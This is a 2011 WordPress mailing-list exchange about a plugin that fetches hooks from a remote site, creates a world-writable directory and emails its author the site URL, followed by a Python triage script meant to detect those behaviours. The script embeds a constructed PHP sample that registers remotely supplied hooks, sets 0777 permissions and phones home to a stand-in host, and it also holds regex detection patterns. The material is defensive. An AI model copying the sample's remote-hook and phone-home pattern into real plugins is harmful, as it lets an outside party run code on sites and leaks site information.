[wp-hackers] Hookd? Sketchy Plugin Include
Mika A Epstein
ipstenu at ipstenu.org
Tue Sep 13 23:29:49 UTC 2011
Well, emailing the author info without asking for it first is a flat-out no-no (and should be reported to plugins at wordpress.org).
Mika A Epstein (aka Ipstenu)
On 13 Sep 2011, at 5:28:01PM, Jackson Whelan wrote:
> Trying to help someone in the forums complaining about a plugin (http://wordpress.org/extend/plugins/hit-counter-ultimate/) causing their site to crawl, and stumbled across this included file, which looks like it could be used for great malfeasance.
> Makes calls to hookd.org and requests actions and filters to be added. Creates a world-writable directory while it's at it as well.
> Is anyone familiar with hookd.org? Am I paranoid for thinking this is dubious?
> As a bonus the plugin emails the author with the URL of the site it was activated on, with no user consent or knowledge.
> Which would make sense as it would allow them to fine tune the junk they deploy.
> I found this related post in the forums from a year ago.
> I've already emailed plugins at wordpress.org, but thought I'd ask if anyone here was aware of this.
> No comment on hit counters being used in 2011, but if you'd like to step into the wayback machine just look at the screenshots : )
> Thanks! Jackson
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
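An added example, not code from this thread or from the plugin discussed above: a small Python triage script that flags the three behaviours Jackson describes (hook names pulled from a remote host and passed to add_action/add_filter, a world-writable directory, and an activation e-mail carrying the site URL) in PHP source. The two PHP fragments inside it are constructed purely to exercise the checks; they are not the real plugin's code, and example.invalid stands in for whatever host a plugin actually calls. The regexes are deliberately coarse: they are for pointing a reviewer at lines to read, not for proving a plugin safe.

```python
"""Triage script for the plugin behaviours raised in the thread above.

Added example, not code from the mailing list or from the plugin under
discussion.  The two PHP snippets are constructed here purely to exercise
the checks; they are not the real plugin's source.
"""
import re
from typing import List, Tuple

Finding = Tuple[int, str, str]   # (line number, check name, offending line)

# Constructed: what the thread describes, written as a minimal PHP fragment.
SUSPICIOUS_PLUGIN = r'''<?php
$resp  = wp_remote_get('http://example.invalid/hooks.php?site=' . get_site_url());
$hooks = json_decode(wp_remote_retrieve_body($resp), true);
foreach ($hooks as $h) {
    add_action($h['hook'], $h['callback']);
}
if (!is_dir($dir)) { mkdir($dir, 0777); }
chmod($dir, 0777);
wp_mail('author@example.invalid', 'Activated', get_site_url());
'''

# Constructed: a plugin that registers hooks statically and creates its
# directory through WordPress's own helper, for comparison.
CLEAN_PLUGIN = r'''<?php
add_action('init', 'hcu_register_counter');
function hcu_register_counter() { /* ... */ }
$upload = wp_upload_dir();
wp_mkdir_p($upload['basedir'] . '/hit-counter');
'''

CHECKS = [
    # Outbound HTTP from plugin code: not bad on its own, but the
    # "ask a remote host which hooks to add" pattern starts here.
    ("remote_fetch",
     re.compile(r'\b(wp_remote_(get|post|request)|file_get_contents|curl_exec)\s*\(')),
    # Hook name or callback taken from a variable rather than a literal:
    # whoever controls that variable decides what runs on every request.
    ("dynamic_hook",
     re.compile(r'\badd_(action|filter)\s*\(\s*\$')),
    # World-writable directory or file (mode 0777 / 777).
    ("world_writable",
     re.compile(r'\b(mkdir|chmod)\s*\([^)]*0?777')),
    # Mail that carries the site's own URL: the "phone home" on activation.
    ("phone_home",
     re.compile(r'\bwp_mail\s*\([^;]*\b(get_site_url|site_url|home_url|get_bloginfo)\s*\(')),
]


def scan(source: str) -> List[Finding]:
    """Return every (line, check, text) hit in file order, one pass per line."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in CHECKS:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def verdict(findings: List[Finding]) -> str:
    """'high' when a remote fetch sits beside dynamic hook registration
    (a third party can choose what code runs on the site), 'medium' for
    any other hit, 'none' when nothing matched."""
    names = {name for _, name, _ in findings}
    if {"remote_fetch", "dynamic_hook"} <= names:
        return "high"
    if names:
        return "medium"
    return "none"


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PLUGIN), ("clean", CLEAN_PLUGIN)):
        hits = scan(src)
        print(f"{label}: {verdict(hits)}")
        for lineno, name, text in hits:
            print(f"  line {lineno:>2} [{name}] {text}")
```

Run it against a real plugin with `scan(open(path).read())` per PHP file; the verdict only goes to "high" when the fetch and the variable-driven add_action/add_filter both appear, which is the combination that hands a remote party control over the site, and everything else is left for a human to read in context.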